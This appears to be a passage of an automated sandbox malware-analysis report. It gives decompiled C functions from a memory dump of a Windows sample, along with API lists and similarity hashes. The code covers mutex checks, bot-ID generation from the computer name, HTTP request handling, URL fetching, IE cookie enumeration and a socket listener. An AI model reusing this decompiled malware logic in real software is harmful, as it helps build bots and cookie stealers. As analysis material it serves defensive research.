    • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
    • String ID: cookie:$ie_cookies
    • API String ID: 468235262-2556801673
    • Opcode ID: 991952bd1d5a8fce671a6e9ba51445fb7957f9440a83482d0a4a62d31e7db818
    • Instruction ID: 9d6fc9f0665cb8e2dff4a7811efc14b5d08af2c97b360498bdd500806d7c7db7
    • Opcode Fuzzy Hash: 991952bd1d5a8fce671a6e9ba51445fb7957f9440a83482d0a4a62d31e7db818
    • Instruction Fuzzy Hash: E8418D71104702EFD7109F65D845B6BBBE4EF44344F00883EF894A62A1EB39C958DF9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040776D, Relevance: 13.6, APIs: 9, Instructions: 90sleepsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040776D(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
				int _v12;
				long _v16;
				void* _v20;
				short _v544;
				short _v1064;
				void* _t26;
				void* _t41;
				int _t44;
				void* _t45;
				void* _t46;

				_t46 = __edi;
				_t45 = __ecx;
				E0040B98C(__edi, _a4, 1,  &_v544);
				E0040B98C(__edi, _a4, 2,  &_v1064);
				_t44 = 0;
				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
				if(_t26 == 0) {
					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
					if(_t26 != 0) {
						goto L1;
					}
					_v20 = CreateMutexW(0x417680, 1,  &_v544);
					if(E00407873(__edi, _t45, E00405AC5 -  *0x416d84, 0) != 0) {
						_a7 = 1;
						_v16 = 0;
						_v12 = 0;
						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
							if(_v16 != 0x103) {
								L15:
								_t44 = _a7;
								goto L5;
							}
							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
							if(_t41 != _t44) {
								CloseHandle(_t41);
								goto L15;
							}
							_v12 = _v12 + 1;
							if(_v12 > 0x1f4) {
								_a7 = _t44;
								goto L15;
							}
							Sleep(0x14);
						}
						goto L15;
					}
					L5:
					CloseHandle(_v20);
					return _t44;
				}
				L1:
				CloseHandle(_t26);
				return 0;
			}













    0x0040776d
    0x0040776d
    0x00407785
    0x00407797
    0x004077a3
    0x004077ac
    0x004077b4
    0x004077ce
    0x004077d6
    0x00000000
    0x00000000
    0x004077ec
    0x00407805
    0x00407814
    0x00407818
    0x0040781b
    0x00407851
    0x00407827
    0x0040786e
    0x0040786e
    0x00000000
    0x0040786e
    0x00407832
    0x0040783a
    0x00407863
    0x00000000
    0x00407863
    0x0040783f
    0x00407847
    0x0040786b
    0x00000000
    0x0040786b
    0x0040784b
    0x0040784b
    0x00000000
    0x00407860
    0x00407807
    0x0040780a
    0x00000000
    0x00407810
    0x004077b6
    0x004077b7
    0x00000000

    APIs
      • Part of subcall function 0040B98C: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00405809,00000002,?), ref: 0040B9A5
      • Part of subcall function 0040B98C: wnsprintfW.SHLWAPI ref: 0040B9C7
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 004077AC
    • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 004077B7
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 004077CE
    • CreateMutexW.KERNEL32(00417680,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 004077E6
    • CloseHandle.KERNEL32(?,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 0040780A
    • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407832
    • Sleep.KERNEL32(00000014,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 0040784B
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00407856
    • CloseHandle.KERNEL32(00000000,?,?,-000112BF,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407863
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
    • String ID:
    • API String ID: 3355469312-0
    • Opcode ID: 6ac731087c6ffc9911121925b8f5cabb11c165ab1d4facf4dd24d78bd589735f
    • Instruction ID: b95937e6517a3c578cca78bbb788a5f3281edb29cb54667581ca6bc8a2ad20b3
    • Opcode Fuzzy Hash: 6ac731087c6ffc9911121925b8f5cabb11c165ab1d4facf4dd24d78bd589735f
    • Instruction Fuzzy Hash: A6318676944218BFDB10AFA0DC88AFE7B7DEB04344F518076F605F2181D378AA45CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B826, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122stringCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0040B826(short* __edx) {
				long _v8;
				char _v12;
				short _v112;
				short _v632;
				signed char _t32;
				long _t39;
				intOrPtr _t41;
				long _t44;
				intOrPtr _t48;
				unsigned int _t50;
				long _t54;
				intOrPtr _t60;
				long _t63;
				void* _t67;
				short* _t70;
				void* _t73;
				CHAR* _t74;

				_t70 = __edx;
				_t32 =  *0x416cd0; // 0x0
				asm("sbb esi, esi");
				_v8 = 0x206;
				_t73 =  ~(_t32 & 1) + 0x80000002;
				E0040F173( &_v632,  &_v632, 0, 0x208);
				if(__edx == 0xffffffff) {
					L9:
					_v8 = 0x31;
					if(GetComputerNameW( &_v112,  &_v8) == 0) {
						lstrcpyW( &_v112, L"unknown");
					}
					_t39 = GetTickCount();
					_t41 =  *0x416c34; // 0x25df5a8
					_t18 = _t41 + 0x58; // 0x25dfb30
					_t44 = wnsprintfW( &_v632, 0x103,  *_t18,  &_v112, _t39) + _t43;
					L12:
					_v8 = _t44 + 2;
					_t48 =  *0x416c34; // 0x25df5a8
					_t22 = _t48 + 0x38; // 0x25df870
					_t23 = _t48 + 0x34; // 0x25df9a0
					E004080D1(_t73,  *_t23,  *_t22, 1,  &_v632, _t44 + 2);
					_t50 = _v8;
					L13:
					_v8 = (_t50 >> 1) - 1;
					_t74 = E0040F47D((_t50 >> 1) - 1,  &_v632);
					_t54 = CharLowerBuffA(_t74, _v8);
					_t67 = 0;
					if(_v8 <= 0) {
						L20:
						 *0x416df0 = _t74;
						return _t54;
					} else {
						goto L14;
					}
					do {
						L14:
						_t54 =  *((intOrPtr*)(_t67 + _t74));
						if(_t54 < 0x61 || _t54 > 0x7a) {
							if(_t54 < 0x30 || _t54 > 0x39) {
								 *((char*)(_t67 + _t74)) = 0x5f;
							}
						}
						_t67 = _t67 + 1;
					} while (_t67 < _v8);
					goto L20;
				}
				if(__edx == 0 ||  *__edx == 0) {
					_t60 =  *0x416c34; // 0x25df5a8
					_t9 = _t60 + 0x38; // 0x25df870
					_t10 = _t60 + 0x34; // 0x25df9a0
					if(E00408088(_t73,  *_t10,  *_t9,  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
						_t50 = _v8;
						if(_t50 > 4) {
							goto L13;
						}
					}
					goto L9;
				} else {
					_t63 = E0040F533(__edx) + _t62;
					_v8 = _t63;
					if(_t63 >= 0x204) {
						_t63 = 0x204;
					}
					E0040F0FC( &_v632, _t70, _t63);
					_t44 = _v8;
					goto L12;
				}
			}




















    0x0040b826
    0x0040b82f
    0x0040b849
    0x0040b84c
    0x0040b853
    0x0040b859
    0x0040b861
    0x0040b8cc
    0x0040b8d4
    0x0040b8e3
    0x0040b8ee
    0x0040b8ee
    0x0040b8f4
    0x0040b8ff
    0x0040b904
    0x0040b91c
    0x0040b91e
    0x0040b921
    0x0040b92b
    0x0040b932
    0x0040b935
    0x0040b939
    0x0040b93e
    0x0040b941
    0x0040b94b
    0x0040b956
    0x0040b959
    0x0040b95f
    0x0040b964
    0x0040b983
    0x0040b983
    0x0040b98b
    0x00000000
    0x00000000
    0x00000000
    0x0040b966
    0x0040b966
    0x0040b966
    0x0040b96b
    0x0040b973
    0x0040b979
    0x0040b979
    0x0040b973
    0x0040b97d
    0x0040b97e
    0x00000000
    0x0040b966
    0x0040b865
    0x0040b8a9
    0x0040b8ae
    0x0040b8b1
    0x0040b8bc
    0x0040b8c4
    0x0040b8ca
    0x00000000
    0x00000000
    0x0040b8ca
    0x00000000
    0x0040b86d
    0x0040b874
    0x0040b87b
    0x0040b880
    0x0040b882
    0x0040b882
    0x0040b88d
    0x0040b892
    0x00000000
    0x0040b892

    APIs
    • GetComputerNameW.KERNEL32(?,00000206), ref: 0040B8DB
    • lstrcpyW.KERNEL32(?,unknown), ref: 0040B8EE
    • GetTickCount.KERNEL32 ref: 0040B8F4
    • wnsprintfW.SHLWAPI ref: 0040B913
    • CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
    • String ID: 1$unknown
    • API String ID: 2565877886-2453001258
    • Opcode ID: ade916f91a228d2741d94118edaefae0663ff4f8422c9e6fed55891879245310
    • Instruction ID: 012d71207f02fe9e5b6beb43737170162e025cd5b326e2a22874ff9f5171b700
    • Opcode Fuzzy Hash: ade916f91a228d2741d94118edaefae0663ff4f8422c9e6fed55891879245310
    • Instruction Fuzzy Hash: 32417EB2900118AACF10EBA8CE49EDE77BDEB04304F1081B6E545E72A1D7359A45DB98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040FA56, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040FA56(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t19;
				void* _t21;
				char* _t27;
				void* _t29;

				_t19 = 0x8404f300;
				if((_a20 & 0x00000002) != 0) {
					_t19 = 0x8444f300;
				}
				if((_a20 & 0x00000004) != 0) {
					_t19 = _t19 | 0x00800000;
				}
				_t27 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t27 = "GET";
				}
				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, 0x416000, _t19, 0);
				if(_t29 == 0) {
					L12:
					_t21 = 0;
				} else {
					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
						L11:
						InternetCloseHandle(_t29);
						goto L12;
					} else {
						_a20 = 0;
						_a8 = 4;
						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L11;
						} else {
							_t21 = _t29;
						}
					}
				}
				return _t21;
			}







    0x0040fa5d
    0x0040fa62
    0x0040fa64
    0x0040fa64
    0x0040fa6d
    0x0040fa6f
    0x0040fa6f
    0x0040fa78
    0x0040fa7d
    0x0040fa7f
    0x0040fa7f
    0x0040faa2
    0x0040faa6
    0x0040faf2
    0x0040faf2
    0x0040faa8
    0x0040fab9
    0x0040faeb
    0x0040faec
    0x00000000
    0x0040fabb
    0x0040faca
    0x0040facd
    0x0040fadc
    0x00000000
    0x0040fae7
    0x0040fae7
    0x0040fae7
    0x0040fadc
    0x0040fab9
    0x0040faf7

    APIs
    • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,00416000,8404F300,00000000), ref: 0040FA9C
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040FAB1
    • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040FAD4
    • InternetCloseHandle.WININET(00000000), ref: 0040FAEC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 3080274660-2753618334
    • Opcode ID: 3d36f8a8f404a932f8f2879a40ce5c5bded012639e8218ce4d6e11d45ea05f32
    • Instruction ID: f63839cbd55a087bf071c573e1a6cd0ece69126faa7de7d8bfb023b666e23467
    • Opcode Fuzzy Hash: 3d36f8a8f404a932f8f2879a40ce5c5bded012639e8218ce4d6e11d45ea05f32
    • Instruction Fuzzy Hash: 6B1191712001296ADB218F519C4CFEB3E9DEB55798F108036BE09E52D0D7B9DA58CBE8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406B38, Relevance: 10.6, APIs: 7, Instructions: 144networkCOMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E00406B38(void* _a4, long* _a8) {
				char _v5;
				signed int _v12;
				char _v16;
				char* _v20;
				char _v24;
				char* _v28;
				char _v48;
				char _v1564;
				char _v1568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				intOrPtr _t63;
				int _t65;
				intOrPtr _t66;
				signed int _t69;
				long _t70;
				intOrPtr _t71;
				signed int _t76;
				signed int _t79;
				long* _t81;
				signed int _t82;
				char* _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				void* _t95;

				_t79 = 0;
				_t91 =  *0x416da4(2, 2, 0);
				if(_t91 != 0xffffffff) {
					_v12 = 0;
					 *0x416dd4(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
					 *0x416d90(_t91);
					_t82 = 0x4c;
					_t56 = _v12 / _t82;
					_t92 = 0;
					_v5 = 1;
					_v16 = 0;
					_v20 = 0;
					_v12 = _t56;
					__eflags = _t56;
					if(_t56 <= 0) {
						L23:
						__eflags = _v12 - _t79;
						_t49 = _v12 != _t79;
						__eflags = _t49;
						return _t56 & 0xffffff00 | _t49;
					}
					_t89 =  &_v1564;
					do {
						__eflags =  *(_t89 - 4) & 0x00000001;
						if(( *(_t89 - 4) & 0x00000001) == 0) {
							goto L17;
						}
						_t56 = E00406B02(_t89);
						__eflags = _t56;
						if(_t56 != 0) {
							goto L17;
						}
						__eflags = _v5 - _t79;
						if(_v5 != _t79) {
							_t66 =  *0x416c64; // 0x41b000
							_t18 = _t66 + 0x24; // 0x20001c
							_t84 =  *_t18 & 0x000000ff;
							_t19 = _t66 + 0x26; // 0x10000020
							_t21 = _t66 + 0x12c; // 0x200148
							_t56 = E0040B52C( &_v24,  *_t19 & 0x000000ff, _t89, ( *_t18 & 0x000000ff) + _t21);
							_t92 = _t56;
							__eflags = _t92;
							if(_t92 != 0) {
								_t69 = E0040F244(_t56, _v24);
								_t92 = 0;
								_v28 = _t69;
								__eflags = _t69;
								if(_t69 != 0) {
									_t70 = GetTickCount();
									_t81 = _a8;
									 *_t81 = _t70;
									_t71 =  *0x416c64; // 0x41b000
									_t26 = _t71 + 0x28; // 0x19331000
									_t93 =  *_t26 & 0x0000ffff;
									__eflags = InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0);
									if(__eflags != 0) {
										_t92 = E00406AC3(_t84,  &_v16, __eflags, _t93, _t73);
									} else {
										_t92 = 0;
									}
									_t76 = GetTickCount() -  *_t81;
									__eflags = _t76;
									 *_t81 = _t76;
									E0040F0C0(_v28);
								}
								_t56 = E0040F0C0(_v24);
							}
							_v5 = 0;
							_t79 = 0;
							__eflags = 0;
						}
						__eflags = _t92 - _t79;
						if(_t92 == _t79) {
							L22:
							goto L23;
						} else {
							_t63 =  *0x416c34; // 0x25df5a8
							_t37 = _t63 + 0x6c; // 0x25dfc11
							_t65 = wnsprintfA( &_v48, 0x14,  *_t37,  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
							_t95 = _t95 + 0x1c;
							_t56 = E0040AD1B( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
							__eflags = _t56;
							if(_t56 != 0) {
								_v12 = _t79;
								L20:
								__eflags = _t92 - _t79;
								if(_t92 != _t79) {
									_t56 = E0040F0C0(_v16);
								}
								goto L22;
							}
						}
						L17:
						_v20 =  &(_v20[1]);
						_t56 = _v20;
						_t89 = _t89 + 0x4c;
						__eflags = _t56 - _v12;
					} while (_t56 < _v12);
					goto L20;
				}
				return 0;
			}































    0x00406b43
    0x00406b50
    0x00406b55
    0x00406b78
    0x00406b7b
    0x00406b82
    0x00406b8f
    0x00406b90
    0x00406b92
    0x00406b94
    0x00406b98
    0x00406b9b
    0x00406b9e
    0x00406ba1
    0x00406ba3
    0x00406ccc
    0x00406ccc
    0x00406ccf
    0x00406ccf
    0x00000000
    0x00406ccf
    0x00406baa
    0x00406bb0
    0x00406bb0
    0x00406bb4
    0x00000000
    0x00000000
    0x00406bbc
    0x00406bc1
    0x00406bc3
    0x00000000
    0x00000000
    0x00406bc9
    0x00406bcc
    0x00406bd2
    0x00406bd7
    0x00406bd7
    0x00406bdb
    0x00406bdf
    0x00406bea
    0x00406bef
    0x00406bf1
    0x00406bf3
    0x00406bf8
    0x00406bfd
    0x00406bff
    0x00406c02
    0x00406c04
    0x00406c06
    0x00406c0c
    0x00406c0f
    0x00406c11
    0x00406c16
    0x00406c16
    0x00406c30
    0x00406c32
    0x00406c42
    0x00406c34
    0x00406c34
    0x00406c34
    0x00406c4a
    0x00406c4a
    0x00406c4f
    0x00406c51
    0x00406c51
    0x00406c59
    0x00406c59
    0x00406c5e
    0x00406c62
    0x00406c62
    0x00406c62
    0x00406c64
    0x00406c66
    0x00406ccb
    0x00000000
    0x00406c68
    0x00406c7c
    0x00406c81
    0x00406c8a
    0x00406c90
    0x00406c9f
    0x00406ca4
    0x00406ca6
    0x00406cbc
    0x00406cbf
    0x00406cbf
    0x00406cc1
    0x00406cc6
    0x00406cc6
    0x00000000
    0x00406cc1
    0x00406ca6
    0x00406ca8
    0x00406ca8
    0x00406cab
    0x00406cae
    0x00406cb1
    0x00406cb1
    0x00000000
    0x00406cba
    0x00000000

    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00406B4A
    • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00406B7B
    • closesocket.WS2_32(00000000), ref: 00406B82
    • GetTickCount.KERNEL32 ref: 00406C06
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 00406C2A
    • GetTickCount.KERNEL32 ref: 00406C44
    • wnsprintfA.SHLWAPI ref: 00406C8A
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
    • String ID:
    • API String ID: 1843894412-0
    • Opcode ID: 556b7ad974a25361c4cb6343682172906826d07c6ab935427586046322c53c46
    • Instruction ID: 76e12400c7fe2ec71bdd07b7afffe08c774bfcab16e606a4c1e2298478928ed2
    • Opcode Fuzzy Hash: 556b7ad974a25361c4cb6343682172906826d07c6ab935427586046322c53c46
    • Instruction Fuzzy Hash: C651B5B1904129AFDB119FA48D85AEEBBB8EF05304F018176F941F3292D7399D15CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E458, Relevance: 10.6, APIs: 7, Instructions: 143windownetworkthreadCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0040E458(void* __ecx, signed int _a8, intOrPtr _a16, void* _a20) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v68;
				char* _v72;
				void* _v88;
				struct tagMSG _v116;
				char _v376;
				char _v1400;
				void* __ebx;
				void* __edi;
				char* _t54;
				int _t55;
				signed int _t58;
				void* _t62;
				char* _t82;
				int _t83;
				void* _t84;
				void* _t92;
				void _t93;
				void* _t94;

				_v8 = _v8 | 0xffffffff;
				_t92 = 0x3c;
				_t83 = 0;
				E0040F173( &_v88,  &_v88, 0, _t92);
				E0040F173( &_v376,  &_v376, 0, 0x104);
				E0040F173( &_v1400,  &_v1400, 0, 0x400);
				_t94 = _a20;
				_t93 = _a16;
				_v72 =  &_v376;
				_v44 =  &_v1400;
				_t54 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
				_v88 = _t92;
				_v68 = 0x103;
				_v40 = 0x3ff;
				_v12 = 0;
				if(( *(_t94 + 2) & 0x00000004) == 0) {
					_t55 = InternetCrackUrlA(_t54, 0, 0,  &_v88);
				} else {
					_t82 = E0040C67E(( *(_t94 + 4) & 0x0000ffff) + _t94, __ecx, _t54, _t93);
					_v12 = _t82;
					_t55 = InternetCrackUrlA(_t82, 0, 0,  &_v88);
					_t83 = 0;
				}
				if(_t55 == _t83) {
					L15:
					E0040F0C0(_v12);
					return _v8;
				} else {
					_push( *((intOrPtr*)(_t93 + 0x430)));
					_t84 = 2;
					_t58 = E0040CC23(_t84);
					_a8 = _t58;
					if(_t58 == 0xffffffff) {
						goto L15;
					}
					_v24 = _t58 * 0x30 +  *0x417024;
					_v28 = _t93;
					_v20 =  &_v88;
					_v16 = 0;
					_t62 = CreateThread(0, 0, E0040E267,  &_v28, 0, 0);
					_a20 = _t62;
					if(_t62 == 0) {
						L11:
						if(_v16 != 1) {
							E0040CCAF(_a8, 0, _t93);
						} else {
							_v8 = 1;
							if( *(_t94 + 0xc) > 0) {
								E0040F0C0( *0x417028);
								E0040F0C0( *0x41702c);
								 *0x417028 = E0040F244(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
								 *0x41702c = E0040F244(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
							}
						}
						goto L15;
					} else {
						L8:
						while(PeekMessageW( &_v116, 0, 0, 0, 1) != 0) {
							DispatchMessageW( &_v116);
						}
						if(MsgWaitForMultipleObjects(1,  &_a20, 0, 0xffffffff, 0x4bf) != 0) {
							goto L8;
						}
						CloseHandle(_a20);
						goto L11;
					}
				}
			}





























    0x0040e461
    0x0040e46a
    0x0040e46c
    0x0040e473
    0x0040e485
    0x0040e497
    0x0040e49c
    0x0040e49f
    0x0040e4a8
    0x0040e4b1
    0x0040e4b8
    0x0040e4be
    0x0040e4c1
    0x0040e4c8
    0x0040e4cf
    0x0040e4d2
    0x0040e4fe
    0x0040e4d4
    0x0040e4dc
    0x0040e4ea
    0x0040e4ed
    0x0040e4f3
    0x0040e4f3
    0x0040e506
    0x0040e5f5
    0x0040e5f8
    0x0040e604
    0x0040e50c
    0x0040e50c
    0x0040e514
    0x0040e515
    0x0040e51a
    0x0040e520
    0x00000000
    0x00000000
    0x0040e533
    0x0040e544
    0x0040e547
    0x0040e54a
    0x0040e54d
    0x0040e553
    0x0040e558
    0x0040e59a
    0x0040e59e
    0x0040e5f0
    0x0040e5a0
    0x0040e5a0
    0x0040e5ab
    0x0040e5b3
    0x0040e5be
    0x0040e5d2
    0x0040e5e6
    0x0040e5e6
    0x0040e5ab
    0x00000000
    0x0040e55a
    0x00000000
    0x0040e566
    0x0040e560
    0x0040e560
    0x0040e58f
    0x00000000
    0x00000000
    0x0040e594
    0x00000000
    0x0040e594
    0x0040e558

    APIs
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0040E4ED
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040E4FE
    • CreateThread.KERNEL32(00000000,00000000,Function_0000E267,?,00000000,00000000), ref: 0040E54D
    • DispatchMessageW.USER32(?), ref: 0040E560
      • Part of subcall function 0040CCAF: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E5F5), ref: 0040CCC5
      • Part of subcall function 0040CCAF: CloseHandle.KERNEL32(?), ref: 0040CCCE
      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD32
      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD3B
      • Part of subcall function 0040CCAF: InternetCloseHandle.WININET(?), ref: 0040CD44
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E56F
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040E587
    • CloseHandle.KERNEL32(?), ref: 0040E594
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandleInternet$CrackMessageWait$CreateDispatchMultipleObjectObjectsPeekSingleThread
    • String ID:
    • API String ID: 2347300336-0
    • Opcode ID: c9d4906ac4cac94c6d5ec2708af79478019d3f70ed8b87ea935097b356443091
    • Instruction ID: c8079277a89f57f11541ed912d238442748324b0377419b3cbb5a25bb0166a60
    • Opcode Fuzzy Hash: c9d4906ac4cac94c6d5ec2708af79478019d3f70ed8b87ea935097b356443091
    • Instruction Fuzzy Hash: D95153B1904218EBDB10DFE5DD85AEF7BBCAB04358F10493AF115E61D0E7789A44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409E00, Relevance: 10.6, APIs: 7, Instructions: 96synchronizationthreadnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 27%
    			E00409E00(void* __eflags) {
				intOrPtr _v12;
				short* _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				short _v46;
				char _v48;
				char _v308;
				signed int _v312;
				void* __esi;
				signed int _t34;
				intOrPtr* _t40;
				intOrPtr _t42;
				intOrPtr _t51;
				void* _t54;
				char _t56;
				signed int _t57;
				signed int _t59;
				void* _t61;

				 *0x416a84 =  *0x416a84 | 0xffffffff;
				_v20 = 0;
				_v16 = 0x416a94;
				_v12 = E00409DB4;
				_t56 = E00410637(__eflags);
				if(_t56 != 0xffffffff) {
					_push( &_v24);
					_push( &_v48);
					_push(_t56);
					_v24 = 0x10;
					if( *0x416dc8() == 0) {
						asm("rol ax, 0x8");
						_v20 = _t56;
						 *0x416a94 = _v46;
					}
				}
				_v32 = 0;
				_v28 = 0xf4240;
				L15:
				while(WaitForSingleObject( *0x416a8c, 0x64) != 0) {
					_v308 = _v20;
					_v312 = 1;
					_t34 =  *0x416dd8(0,  &_v312, 0, 0,  &_v32);
					__eflags = _t34 - 0xffffffff;
					if(_t34 == 0xffffffff) {
						break;
					}
					__eflags = _t34;
					if(_t34 > 0) {
						while(1) {
							L14:
							__eflags = _v312;
							if(_v312 == 0) {
								goto L15;
							}
							_v312 = _v312 - 1;
							_t51 =  *((intOrPtr*)(_t61 + _v312 * 4 - 0x130));
							_t59 = 0;
							__eflags = 0;
							_t40 =  &_v20;
							while(1) {
								__eflags = _t51 -  *_t40;
								if(_t51 ==  *_t40) {
									break;
								}
								_t59 = _t59 + 1;
								_t40 = _t40 + 0xc;
								__eflags = _t59 - 1;
								if(_t59 < 1) {
									continue;
								}
								goto L14;
							}
							_t60 = _t59 * 0xc;
							_t54 =  *0x416db0( *((intOrPtr*)(_t61 + _t59 * 0xc - 0x10)), 0, 0);
							__eflags = _t54 - 0xffffffff;
							if(_t54 != 0xffffffff) {
								 *0x416a88 =  *0x416a88 + 1;
								_t42 = E0040C14A(_t51,  *((intOrPtr*)(_t61 + _t60 - 8)), _t54);
								__eflags = _t42;
								if(_t42 == 0) {
									 *0x416d90(_t54);
									 *0x416a88 =  *0x416a88 - 1;
									__eflags =  *0x416a88;
								}
							}
						}
					}
				}
				 *0x416d90(_v20);
				_t57 =  *0x416a84; // 0x0
				E004108F5(_t57);
				 *0x416a88 =  *0x416a88 - 1;
				_push(0);
				RtlExitUserThread();
				return 0;
			}























    0x00409e09
    0x00409e15
    0x00409e18
    0x00409e1f
    0x00409e2b
    0x00409e30
    0x00409e35
    0x00409e39
    0x00409e3a
    0x00409e3b
    0x00409e4a
    0x00409e50
    0x00409e54
    0x00409e57
    0x00409e57
    0x00409e4a
    0x00409e5d
    0x00409e60
    0x00000000
    0x00409f08
    0x00409e6f
    0x00409e83
    0x00409e8d
    0x00409e93
    0x00409e96
    0x00000000
    0x00000000
    0x00409e9c
    0x00409e9e
    0x00409f00
    0x00409f00
    0x00409f00
    0x00409f06
    0x00000000
    0x00000000
    0x00409ea2
    0x00409eae
    0x00409eb5
    0x00409eb5
    0x00409eb7
    0x00409eba
    0x00409eba
    0x00409ebc
    0x00000000
    0x00000000
    0x00409ebe
    0x00409ebf
    0x00409ec2
    0x00409ec5
    0x00000000
    0x00000000
    0x00000000
    0x00409ec7
    0x00409ec9
    0x00409ed8
    0x00409eda
    0x00409edd
    0x00409edf
    0x00409eea
    0x00409eef
    0x00409ef1
    0x00409ef4
    0x00409efa
    0x00409efa
    0x00409efa
    0x00409ef1
    0x00409edd
    0x00409f00
    0x00409e9e
    0x00409f21
    0x00409f27
    0x00409f2d
    0x00409f32
    0x00409f38
    0x00409f39
    0x00409f45

    APIs
    • getsockname.WS2_32(00000000,?,?), ref: 00409E42
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00409E8D
    • accept.WS2_32(?,00000000,00000000), ref: 00409ED2
    • closesocket.WS2_32(00000000), ref: 00409EF4
    • WaitForSingleObject.KERNEL32(00000064), ref: 00409F10
    • closesocket.WS2_32(?), ref: 00409F21
    • RtlExitUserThread.NTDLL(00000000), ref: 00409F39
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: closesocket$ExitObjectSingleThreadUserWaitacceptgetsocknameselect
    • String ID:
    • API String ID: 307878408-0
    • Opcode ID: 7d97cf2f9fc47a91f4a1acfb98d1f74a0355a90613132ee1e7c696aae083b4e2
